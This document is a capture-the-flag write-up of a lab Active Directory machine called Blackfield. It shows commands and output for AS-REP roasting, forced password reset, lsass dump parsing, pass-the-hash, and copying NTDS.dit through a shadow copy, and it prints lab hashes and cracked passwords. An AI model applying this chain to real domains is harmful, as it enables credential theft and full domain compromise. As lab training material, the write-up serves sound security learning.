Hard Windows Active Directory machine with a clean, realistic attack chain. Guest SMB access leaks hundreds of
usernames from a profiles share. AS-REP roasting cracks the support account. BloodHound reveals
ForceChangePassword over audit2020, whose forensic share holds an lsass memory dump.
pypykatz extracts the svc_backup NT hash — a Backup Operator account. SeBackupPrivilege
combined with a VSS shadow copy lets us extract the locked NTDS.dit, giving us the domain Administrator hash.
User Flag
3920bb317axxxxxxxxxxxxxxxxxxxxxx
Root Flag
4375a629c7xxxxxxxxxxxxxxxxxxxxxx
01Reconnaissance
Full port scan reveals a classic DC profile. The domain is BLACKFIELD.local. No starting credentials — we begin unauthenticated.
nmap
$nmap-sC -sV -p---min-rate5000-oNnmap_full.txt10.129.229.1753/tcp open domain Simple DNS Plus88/tcp open kerberos-sec Windows KDC389/tcp open ldap Active Directory (Domain: BLACKFIELD.local)445/tcp open microsoft-ds SMB (signing required)5985/tcp open wsman WinRM| clock-skew: +7h0m3s
clock skew +7h: Kerberos requires clocks within 5 minutes of the DC. If you see KRB_AP_ERR_SKEW, sync first: sudo ntpdate -u 10.129.229.17. On this box NTLM is still available so it's rarely a blocker, but keep it in mind.
Null session is denied but the guest account (blank password) works. The profiles$ share contains hundreds of empty user profile directories — the directory names are valid AD usernames.
guest share enum
$nxc smb $IP-u'guest'-p''--sharesprofiles$ READforensic (no access)IPC$ READ
finding: ~300 AD usernames extracted. Notable ones: audit2020, support, svc_backup. The share exists purely for profile storage — guest read access exposes the entire user list.
03AS-REP Roasting — support
AS-REP roasting targets accounts with Kerberos pre-authentication disabled. Without pre-auth, the KDC returns an encrypted TGT blob to any unauthenticated requester — the blob is encrypted with the account's password hash and can be cracked offline.
credential:support:#00^BlackKnight — cracked in ~6 seconds.
04BloodHound — ACL Attack Path
With valid credentials, collect all BloodHound data to map AD attack paths.
bloodhound-python collection
$bloodhound-python-usupport-p'#00^BlackKnight'-dBLACKFIELD.local-ns$IP-c All --zip
attack path discovered: support →(ForceChangePassword)→ audit2020. ForceChangePassword allows changing a user's password without knowing their current one — full account takeover with no prior knowledge.
05ForceChangePassword → audit2020
Use rpcclient to change audit2020's password directly over SMB/IPC$. The info level 23 is Windows USER_INFO_23 — the RPC level specifically for password changes without requiring the current password.
The forensic share contains process memory dumps in memory_analysis/. The critical file is lsass.zip — LSASS (Local Security Authority Subsystem Service) handles Windows authentication and holds NT hashes and sometimes plaintext credentials for all logged-in users.
Standard smbclient get times out on large files. Use impacket-smbclient instead.
download lsass.zip via impacket-smbclient
$impacket-smbclient'BLACKFIELD.local/audit2020:Password123!@'$IP# use forensic
# cd memory_analysis
# get lsass.zip
credential:svc_backup NT hash 9658d1d1dcd9250115e2205d9f48400d. Storing process memory dumps on a network share is catastrophic — LSASS holds live credentials for every authenticated session.
07Foothold — svc_backup via Pass-the-Hash
Pass the NT hash directly to evil-winrm — no password cracking needed.
evil-winrm PTH → user flag
$nxc winrm $IP-usvc_backup-H'9658d1d1dcd9250115e2205d9f48400d'[+] BLACKFIELD.local\svc_backup (Pwn3d!)$evil-winrm-i$IP-usvc_backup-H'9658d1d1dcd9250115e2205d9f48400d'*Evil-WinRM* PS C:\Users\svc_backup\Desktop> type user.txt3920bb317axxxxxxxxxxxxxxxxxxxxxx
confirm SeBackupPrivilege
*Evil-WinRM* PS C:\> whoami /privSeBackupPrivilege Back up files and directories Enabled
key privilege:svc_backup is a member of Backup Operators. SeBackupPrivilege allows bypassing file ACLs for backup purposes — effectively full filesystem read, including locked files.
Why NTDS.dit, not SAM? SAM stores hashes for local accounts only. On a Domain Controller, the domain Administrator hash lives in NTDS.dit at C:\Windows\NTDS\ntds.dit — the Active Directory database containing every domain account's NT hash. NTDS.dit is locked by the AD DS service while running; even with SeBackupPrivilege you can't copy it directly.
The solution: Volume Shadow Copy (VSS). VSS creates a point-in-time snapshot of a volume including locked files. We create a shadow copy of C:\, expose it as Z:\, then copy NTDS.dit from the snapshot where it isn't locked.
Step 1 — Create the diskshadow script on Kali. The script must use Windows line endings (CRLF) or diskshadow silently fails.
unix2dos is mandatory: diskshadow parses each line expecting CRLF. With LF-only line endings it silently skips commands or errors out. The VSS context never gets created.
why robocopy /b? The /b flag enables backup mode, which activates SeBackupPrivilege to bypass file ACL restrictions. Normal file copy commands don't invoke the privilege even when it's present.
Step 4 — Save the SYSTEM hive. NTDS.dit hashes are encrypted with a boot key stored in the SYSTEM registry hive — without it, secretsdump can't decrypt them.
$impacket-secretsdump-ntdsntds.dit-systemsystem.hive LOCAL
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::svc_backup:1413:aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d:::
evil-winrm PTH as Administrator → root flag
$evil-winrm-i$IP-uAdministrator-H'184fb5e5178480be64824d4cd53b99ee'*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt4375a629c7xxxxxxxxxxxxxxxxxxxxxx
key takeaways:
· Guest access to a profiles share leaks the entire user list — perfect AS-REP/spray target
· ForceChangePassword gives full account takeover with no knowledge of the current password
· LSASS memory dumps on network shares expose live NT hashes for all authenticated sessions
· SAM holds local accounts only — on a DC you need NTDS.dit for domain hashes
· SeBackupPrivilege = near-equivalent to Domain Admin; Backup Operators must be treated as a privileged group
· VSS shadow copies bypass file locks — the only reliable way to copy NTDS.dit from a live DC
· Both NTDS.dit and the SYSTEM hive are required: hashes are encrypted with the boot key stored in SYSTEM